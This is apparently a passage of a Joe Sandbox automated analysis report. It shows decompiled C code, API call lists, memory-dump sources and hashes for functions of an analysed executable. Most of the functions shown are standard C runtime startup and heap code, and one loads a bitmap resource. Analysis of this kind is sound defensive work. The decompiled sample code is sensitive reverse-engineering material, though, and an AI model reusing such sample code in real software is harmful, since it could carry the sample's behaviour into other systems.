                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: _malloc
                  • String ID:
                  • API String ID: 1579825452-0
                  • Opcode ID: c631df97d44a5f9399ba7b11fe52b4abd1c23a93cd47459c8e3c4dc88b898cb0
                  • Instruction ID: 96eac3bd80cb15c2f38a00244d9ba988f4f89dd5850f29b070fc849da7ef642b
                  • Opcode Fuzzy Hash: c631df97d44a5f9399ba7b11fe52b4abd1c23a93cd47459c8e3c4dc88b898cb0
                  • Instruction Fuzzy Hash: 82E06D36500A159BC7108F4AE404BD6B7DCDFA1375B26C46BE804CB252CA79E8958BA4
                  Uniqueness

                  Uniqueness Score: 0.33%

                  Function 00522AD0, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                  Download Yara Rule
                  APIs
                  • IsWow64Process.KERNELBASE(000000FF,?), ref: 00522AE2
                  Memory Dump Source
                  • Source File: 00000004.00000002.297282519.00521000.00000020.00000001.sdmp, Offset: 00521000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_521000_982.jbxd
                  Similarity
                  • API ID: ProcessWow64
                  • String ID:
                  • API String ID: 2092917072-0
                  • Opcode ID: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction ID: 890256bae5d4826c0f7435f6e434bea0fcbb6ca73656ccfbdb31024454639678
                  • Opcode Fuzzy Hash: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction Fuzzy Hash: 97E04F3490925CFBCB24DF98D8447AD7BB8BF01311F200255EC11936C0D7B69E44E751
                  Uniqueness

                  Uniqueness Score: 0.16%

                  Function 0041F075, Relevance: 1.5, APIs: 1, Instructions: 21COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0041F075(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t19;
				void* _t20;

				_push(8);
				E0042925E(E004393BE, __ebx, __edi, __esi);
				_t19 = __ecx;
				if( *__ecx == 0) {
					E00420C0D(0x10);
					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
					if( *__ecx == 0) {
						 *__ecx =  *((intOrPtr*)(_t20 + 8))();
					}
					 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
					E00420C7F(0x10);
				}
				return E00429303( *_t19);
			}





                  0x0041f075
                  0x0041f07c
                  0x0041f081
                  0x0041f087
                  0x0041f08b
                  0x0041f092
                  0x0041f098
                  0x0041f09d
                  0x0041f09d
                  0x0041f09f
                  0x0041f0a5
                  0x0041f0a5
                  0x0041f0b1

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041F07C
                    • Part of subcall function 00420C0D: EnterCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C47
                    • Part of subcall function 00420C0D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C59
                    • Part of subcall function 00420C0D: LeaveCriticalSection.KERNEL32(0044FBB0,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C66
                    • Part of subcall function 00420C0D: EnterCriticalSection.KERNEL32(?,?,?,?,?,0041F090,00000010,00000008,0042086B,0042080E,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 00420C76
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                  • String ID:
                  • API String ID: 1641187343-0
                  • Opcode ID: c0216205ed77c7cc1f131cf05e65f243ad3cd27ceee9a1bc5f39da4a9754f464
                  • Instruction ID: 3dd9fac96ffd4f8c3fa54f6b7e61c1b4760e57862e1cb66ca705b6a13e6fc861
                  • Opcode Fuzzy Hash: c0216205ed77c7cc1f131cf05e65f243ad3cd27ceee9a1bc5f39da4a9754f464
                  • Instruction Fuzzy Hash: 0BE09230304210E7D774AFB5C442789B6E07F14354F50462EF9E0DA2C2DB748D409718
                  Uniqueness

                  Uniqueness Score: 0.04%

                  Function 0042C630, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042C630(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x45024c = _t6;
				if(_t6 != 0) {
					 *0x451924 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                  0x0042c645
                  0x0042c64b
                  0x0042c652
                  0x0042c659
                  0x0042c65f
                  0x0042c655
                  0x0042c655
                  0x0042c655

                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0042C645
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: f0721fcb8ddfb9430277d72bca9d0576c2c484b911b8e0f7858c656aa6a95d2c
                  • Instruction ID: dc21e2f7d52cc5223e6b36bdbaf9974fbecc4c3c998ff19ee700cf7bf4ea1111
                  • Opcode Fuzzy Hash: f0721fcb8ddfb9430277d72bca9d0576c2c484b911b8e0f7858c656aa6a95d2c
                  • Instruction Fuzzy Hash: 24D05E766913045ADB105F757C0876A3BDCD384396F108436B84CC6290E574C950CA4C
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 00429111, Relevance: 1.5, APIs: 1, Instructions: 14COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E00429111(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t9;
				void* _t18;

				_push(0xc);
				_push(0x447b58);
				E00429338(__ebx, __edi, __esi);
				E0042AF11();
				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
				_t9 = E00429026(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
				 *(_t18 - 4) = 0xfffffffe;
				E00429147();
				return E0042937D( *((intOrPtr*)(_t18 - 0x1c)));
			}





                  0x00429111
                  0x00429113
                  0x00429118
                  0x0042911d
                  0x00429122
                  0x00429129
                  0x0042912f
                  0x00429132
                  0x00429139
                  0x00429146

                  APIs
                    • Part of subcall function 0042AF11: __lock.LIBCMT ref: 0042AF13
                  • __onexit_nolock.LIBCMT ref: 00429129
                    • Part of subcall function 00429026: __decode_pointer.LIBCMT ref: 00429035
                    • Part of subcall function 00429026: __decode_pointer.LIBCMT ref: 00429045
                    • Part of subcall function 00429026: __msize.LIBCMT ref: 00429063
                    • Part of subcall function 00429026: __realloc_crt.LIBCMT ref: 00429087
                    • Part of subcall function 00429026: __realloc_crt.LIBCMT ref: 0042909D
                    • Part of subcall function 00429026: __encode_pointer.LIBCMT ref: 004290AF
                    • Part of subcall function 00429026: __encode_pointer.LIBCMT ref: 004290BD
                    • Part of subcall function 00429026: __encode_pointer.LIBCMT ref: 004290C8
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                  • String ID:
                  • API String ID: 1316407801-0
                  • Opcode ID: d0cba814af76e99fa1f5c5100ac0f924490c0fad868057674edee770e45ccadb
                  • Instruction ID: 256d7cc1d37675ab01bdc673f319943b9992eb9d29c4a49d690572677a75f72f
                  • Opcode Fuzzy Hash: d0cba814af76e99fa1f5c5100ac0f924490c0fad868057674edee770e45ccadb
                  • Instruction Fuzzy Hash: 65D01770A00219AADB10FBAAEC06B9C7670AF44318FA0414EB420661D2CA3C1E019A4D
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 0043236F, Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0043236F(void* __eflags) {
				int _t9;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;

				_push(0x10);
				_push(0x447f08);
				E00429338(_t12, _t13, _t14);
				 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
				_t9 = InitializeCriticalSectionAndSpinCount( *(_t15 + 8),  *(_t15 + 0xc)); // executed
				 *(_t15 - 0x1c) = _t9;
				 *(_t15 - 4) = 0xfffffffe;
				return E0042937D( *(_t15 - 0x1c));
			}








                  0x0043236f
                  0x00432371
                  0x00432376
                  0x0043237b
                  0x00432385
                  0x0043238b
                  0x004323bf
                  0x004323ce

                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNELBASE(8007000E,?,00447F08,00000010,0042EA88,00000000,00000FA0,00447E48,0000000C,0042EAE9,8007000E,?,?,00430446,00000004,00447EC8), ref: 00432385
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
                  • String ID:
                  • API String ID: 2593887523-0
                  • Opcode ID: 435db0119b2e2a5cd1513eb4b7c5634abbb2a5105ebc6a46fd6bf240d20ba23a
                  • Instruction ID: 0b45ea81c99c3eaf9b4dca524f18df2cf3e30860aae513f0f2e3f31f292ba95f
                  • Opcode Fuzzy Hash: 435db0119b2e2a5cd1513eb4b7c5634abbb2a5105ebc6a46fd6bf240d20ba23a
                  • Instruction Fuzzy Hash: A6D05E30940309EBDF10EFA5DC057DC7B30AF08320FA08155B821662E0C3BD5E12AF48
                  Uniqueness

                  Uniqueness Score: 0.08%

                  Function 0042D433, Relevance: 1.5, APIs: 1, Instructions: 5COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042D433() {
				intOrPtr _t1;

				_t1 = E0042C093(E0042D3AF); // executed
				 *0x450250 = _t1;
				return _t1;
			}




                  0x0042d438
                  0x0042d43e
                  0x0042d443

                  APIs
                  • __encode_pointer.LIBCMT ref: 0042D438
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0A5
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000003,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0BC
                    • Part of subcall function 0042C093: RtlEncodePointer.NTDLL(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0FA
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 3ce54f7310ca48c7751c76d8a15b172f27dc05c7042c64af59e04d961205916c
                  • Instruction ID: b882495202cef156864d025d42edda82f839d3d5945db6e760e545b44dfa8962
                  • Opcode Fuzzy Hash: 3ce54f7310ca48c7751c76d8a15b172f27dc05c7042c64af59e04d961205916c
                  • Instruction Fuzzy Hash: 44A022A2B003A0C00200BBB0BC8230823802280B02FB000BFB028CA0C2CF288000080F
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 0042C105, Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042C105() {
				void* _t1;

				_t1 = E0042C093(0); // executed
				return _t1;
			}




                  0x0042c107
                  0x0042c10d

                  APIs
                  • __encode_pointer.LIBCMT ref: 0042C107
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0A5
                    • Part of subcall function 0042C093: TlsGetValue.KERNEL32(00000003,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0BC
                    • Part of subcall function 0042C093: RtlEncodePointer.NTDLL(00000000,?,0042C10C,00000000,00432532,0044FD18,00000000,00000314,?,0042B89E,0044FD18,Microsoft Visual C++ Runtime Library,00012010), ref: 0042C0FA
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  • Opcode ID: 13a17f0596a0aed883ed0105cb9e7537870fdc0ce3ddd250ed4f3766f44b6160
                  • Instruction ID: 2fc5ce743ffed4cb605e1d783de8b42f57259c5a4fea7c046effaedeb37e91c5
                  • Opcode Fuzzy Hash: 13a17f0596a0aed883ed0105cb9e7537870fdc0ce3ddd250ed4f3766f44b6160
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: 0.02%

                  Function 00427A0F, Relevance: 1.5, APIs: 1, Instructions: 2COMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t33;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t45;
				signed int _t51;
				void* _t61;
				intOrPtr _t63;
				void* _t66;
				void* _t68;

				_t61 = __edx;
				E0042C660(); // executed
				_push(0x58);
				_push(0x447af0);
				E00429338(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t66 - 4)) = 0;
				GetStartupInfoW(_t66 - 0x68);
				_t63 = 0xfffffffe;
				 *((intOrPtr*)(_t66 - 4)) = _t63;
				_t68 =  *0x400000 - 0x5a4d; // 0x5a4d
				if(_t68 != 0) {
					L6:
					 *(_t66 - 0x1c) = 0;
				} else {
					_t45 =  *0x40003c; // 0xe8
					if( *((intOrPtr*)(_t45 + 0x400000)) != 0x4550 ||  *((intOrPtr*)(_t45 + 0x400018)) != 0x10b ||  *((intOrPtr*)(_t45 + 0x400074)) <= 0xe) {
						goto L6;
					} else {
						 *(_t66 - 0x1c) = 0 |  *((intOrPtr*)(_t45 + 0x4000e8)) != 0x00000000;
					}
				}
				_t25 = E0042C630(1); // executed
				if(_t25 == 0) {
					E00427869(0x1c);
				}
				_t26 = E0042C4A3(1);
				_t74 = _t26;
				if(_t26 == 0) {
					E00427869(0x10);
				}
				E0042C047();
				 *((intOrPtr*)(_t66 - 4)) = 1;
				_t28 = E0042BDF3(1, _t63, 0, _t74); // executed
				if(_t28 < 0) {
					E0042AEA5(_t61, _t63, 0x1b);
				}
				 *0x451a54 = GetCommandLineW();
				 *0x44fccc = E0042BD96();
				if(E0042BCE8() < 0) {
					_t31 = E0042AEA5(_t61, _t63, 8);
				}
				if(E0042BAB9(_t31, _t61) < 0) {
					E0042AEA5(_t61, _t63, 9);
				}
				_t33 = E0042AF64(1); // executed
				if(_t33 != 0) {
					E0042AEA5(_t61, _t63, _t33);
				}
				_t34 = E0042BA73();
				_t79 =  *(_t66 - 0x3c) & 1;
				if(( *(_t66 - 0x3c) & 1) == 0) {
					_t51 = 0xa;
				} else {
					_t51 =  *(_t66 - 0x38) & 0x0000ffff;
				}
				_push(_t51);
				_t35 = E0043820A(_t51, _t61, _t79, 0x400000, 0, _t34); // executed
				 *((intOrPtr*)(_t66 - 0x20)) = _t35;
				if( *(_t66 - 0x1c) == 0) {
					E0042B115(_t35);
				}
				E0042B141();
				 *((intOrPtr*)(_t66 - 4)) = _t63;
				_t37 =  *((intOrPtr*)(_t66 - 0x20));
				return E0042937D(_t37);
			}
















                  0x00427a0f
                  0x00427a0f
                  0x00427892
                  0x00427894
                  0x00427899
                  0x004278a0
                  0x004278a7
                  0x004278af
                  0x004278b0
                  0x004278b8
                  0x004278bf
                  0x004278f9
                  0x004278f9
                  0x004278c1
                  0x004278c1
                  0x004278d0
                  0x00000000
                  0x004278e9
                  0x004278f4
                  0x004278f4
                  0x004278d0
                  0x00427900
                  0x00427908
                  0x0042790c
                  0x00427911
                  0x00427912
                  0x00427917
                  0x00427919
                  0x0042791d
                  0x00427922
                  0x00427923
                  0x00427928
                  0x0042792b
                  0x00427932
                  0x00427936
                  0x0042793b
                  0x00427941
                  0x0042794b
                  0x00427957
                  0x0042795b
                  0x00427960
                  0x00427968
                  0x0042796c
                  0x00427971
                  0x00427973
                  0x0042797b
                  0x0042797e
                  0x00427983
                  0x00427984
                  0x00427989
                  0x0042798c
                  0x00427996
                  0x0042798e
                  0x0042798e
                  0x0042798e
                  0x00427997
                  0x0042799f
                  0x004279a4
                  0x004279aa
                  0x004279ad
                  0x004279ad
                  0x004279b2
                  0x004279b7
                  0x004279f1
                  0x00427a0e

                  APIs
                  • ___security_init_cookie.LIBCMT ref: 00427A0F
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ___security_init_cookie
                  • String ID:
                  • API String ID: 3657697845-0
                  • Opcode ID: 53b8f16b72db3310721ece346a94ebdface8abf86fc276f890df9f663dee7cac
                  • Instruction ID: cb5d0c60b16b6ce24c2eda005c90f3fcf977391523bc92f21d27921aeb9617b1
                  • Opcode Fuzzy Hash: 53b8f16b72db3310721ece346a94ebdface8abf86fc276f890df9f663dee7cac
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: 0.71%

                  Non-executed Functions

                  Function 004190A2, Relevance: 22.6, APIs: 15, Instructions: 144UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E004190A2(signed int _a4, signed int _a8, int _a12) {
				BITMAPINFO* _v8;
				struct HDC__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				BITMAPINFO* _t54;
				BITMAPINFO* _t59;
				signed char _t63;
				struct HDC__* _t69;
				struct HBITMAP__* _t70;
				void* _t74;
				struct HDC__* _t75;
				signed int _t79;
				struct HWND__* _t84;
				intOrPtr* _t92;
				void* _t97;
				signed int _t98;
				intOrPtr _t102;
				int* _t103;
				int _t104;
				BITMAPINFO* _t107;

				_t53 = LoadResource(_a4, _a8);
				_t84 = 0;
				_v24 = _t53;
				if(_t53 != 0) {
					_t54 = LockResource(_t53);
					_v8 = _t54;
					__eflags = _t54;
					if(_t54 == 0) {
						goto L1;
					}
					_t101 = _t54->bmiHeader + 0x40;
					_t107 = E004282CD(0, _t97, _t54->bmiHeader + 0x40, _t54->bmiHeader + 0x40);
					__eflags = _t107;
					if(_t107 != 0) {
						E00402850(0, _t107, _t101, _v8, _t101);
						_t59 = _t107 + _t107->bmiHeader;
						__eflags = _t59;
						_v12 = _t59;
						_a8 = 0;
						do {
							_t92 = _t59 + _a8 * 4;
							_t102 =  *_t92;
							_t98 = 0;
							__eflags = 0;
							_v16 = _t92;
							while(1) {
								__eflags = _t102 -  *((intOrPtr*)(0x43f23c + _t98 * 8));
								if(_t102 ==  *((intOrPtr*)(0x43f23c + _t98 * 8))) {
									break;
								}
								_t98 = _t98 + 1;
								__eflags = _t98 - 4;
								if(_t98 < 4) {
									continue;
								}
								goto L14;
							}
							__eflags = _a12 - _t84;
							if(_a12 == _t84) {
								_t103 = 0x43f240 + _t98 * 8;
								_a4 = GetSysColor( *_t103) >> 0x00000008 & 0x000000ff;
								_t63 = GetSysColor( *_t103);
								 *_v16 = GetSysColor( *_t103) >> 0x00000010 & 0x000000ff | ((_t63 & 0x000000ff) << 0x00000008 | _a4) << 0x00000008;
								_t59 = _v12;
								_t84 = 0;
								__eflags = 0;
							} else {
								__eflags =  *(0x43f240 + _t98 * 8) - 0x12;
								if( *(0x43f240 + _t98 * 8) != 0x12) {
									 *_t92 = 0xffffff;
								}
							}
							L14:
							_a8 = _a8 + 1;
							__eflags = _a8 - 0x10;
						} while (_a8 < 0x10);
						_t104 = _t107->bmiHeader.biWidth;
						_a12 = _t104;
						_a8 = _t107->bmiHeader.biHeight;
						_t69 = GetDC(_t84);
						_v12 = _t69;
						_t70 = CreateCompatibleBitmap(_t69, _t104, _a8);
						_v16 = _t70;
						__eflags = _t70 - _t84;
						if(__eflags != 0) {
							_t75 = CreateCompatibleDC(_v12);
							_t104 = SelectObject;
							_a4 = _t75;
							_v20 = SelectObject(_t75, _v16);
							_t79 = 1 << _t107->bmiHeader.biBitCount;
							__eflags = 1;
							_t40 = _t79 * 4; // 0xa8
							StretchDIBits(_a4, _t84, _t84, _a12, _a8, _t84, _t84, _a12, _a8, _v8 + _t40 + 0x28, _t107, _t84, 0xcc0020);
							SelectObject(_a4, _v20);
							DeleteDC(_a4);
						}
						ReleaseDC(_t84, _v12);
						_push(_t107);
						E00428397(_t84, _t104, _t107, __eflags);
						FreeResource(_v24);
						_t74 = _v16;
						goto L18;
					} else {
						_t74 = 0;
						L18:
						return _t74;
					}
				}
				L1:
				return 0;
			}





























                  0x004190b1
                  0x004190b7
                  0x004190b9
                  0x004190be
                  0x004190c8
                  0x004190ce
                  0x004190d1
                  0x004190d3
                  0x00000000
                  0x00000000
                  0x004190d9
                  0x004190e2
                  0x004190e5
                  0x004190e7
                  0x004190f6
                  0x00419100
                  0x00419100
                  0x00419102
                  0x00419105
                  0x00419108
                  0x0041910b
                  0x0041910e
                  0x00419110
                  0x00419110
                  0x00419112
                  0x00419115
                  0x00419115
                  0x0041911c
                  0x00000000
                  0x00000000
                  0x0041911e
                  0x0041911f
                  0x00419122
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00419124
                  0x00419126
                  0x00419129
                  0x00419143
                  0x00419156
                  0x00419159
                  0x0041917a
                  0x0041917c
                  0x0041917f
                  0x0041917f
                  0x0041912b
                  0x0041912b
                  0x00419133
                  0x00419135
                  0x00419135
                  0x00419133
                  0x00419181
                  0x00419181
                  0x00419184
                  0x00419184
                  0x0041918e
                  0x00419195
                  0x00419198
                  0x0041919b
                  0x004191a4
                  0x004191a9
                  0x004191af
                  0x004191b2
                  0x004191b4
                  0x004191b9
                  0x004191c2
                  0x004191c9
                  0x004191d6
                  0x004191de
                  0x004191de
                  0x004191e3
                  0x004191fb
                  0x00419207
                  0x0041920c
                  0x0041920c
                  0x00419216
                  0x0041921c
                  0x0041921d
                  0x00419226
                  0x0041922c
                  0x00000000
                  0x004190e9
                  0x004190e9
                  0x0041922f
                  0x00000000
                  0x00419230
                  0x004190e7
                  0x004190c0
                  0x00000000

                  APIs
                  • LoadResource.KERNEL32(004067C9,?,00000000,004067C9,?,?,004067C9,00000080,?,?,?,0000E800), ref: 004190B1
                  • LockResource.KERNEL32(00000000,?,004067C9,00000080,?,?,?,0000E800), ref: 004190C8
                  • _malloc.LIBCMT ref: 004190DD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Resource$LoadLock_malloc
                  • String ID:
                  • API String ID: 2582927105-0
                  • Opcode ID: 72b139f24afd76829470f9b937fd0400b2ca6d3edc243f5937ebc25a02abbe8c
                  • Instruction ID: 2cbef2811495ef08249826e9859fe603c90bc7921312da5709a73e17ebf10656
                  • Opcode Fuzzy Hash: 72b139f24afd76829470f9b937fd0400b2ca6d3edc243f5937ebc25a02abbe8c
                  • Instruction Fuzzy Hash: 5B51AD72900109FFDF009FA5CC888AEBFB5FF48344B10846AF91597220C7359AA1EF65
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00412AE3, Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 430libraryloaderUNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00412AE3(void* __ebx, signed int __ecx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr _t284;
				intOrPtr _t285;
				intOrPtr _t286;
				intOrPtr _t288;
				struct HINSTANCE__** _t291;
				intOrPtr _t294;
				signed int _t302;
				signed int _t305;
				signed int _t318;
				signed int _t323;
				signed int _t328;
				intOrPtr _t332;
				signed int _t333;
				intOrPtr _t342;
				intOrPtr _t352;
				signed int _t361;
				intOrPtr* _t365;
				signed int _t369;
				intOrPtr _t372;
				intOrPtr _t387;
				signed int _t439;
				signed int _t442;
				signed int _t445;
				signed int _t450;
				void* _t452;
				intOrPtr _t453;
				signed int _t455;
				void* _t456;
				void* _t457;
				void* _t461;
				void* _t464;
				intOrPtr _t473;
				void* _t476;
				void* _t481;
				void* _t489;
				void* _t504;

				_t451 = __esi;
				_push(0x18);
				_t282 = E0042922B(E00438C36, __ebx, __edi, __esi);
				_t369 = __ecx;
				 *(_t456 - 0x24) = __ecx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 1) {
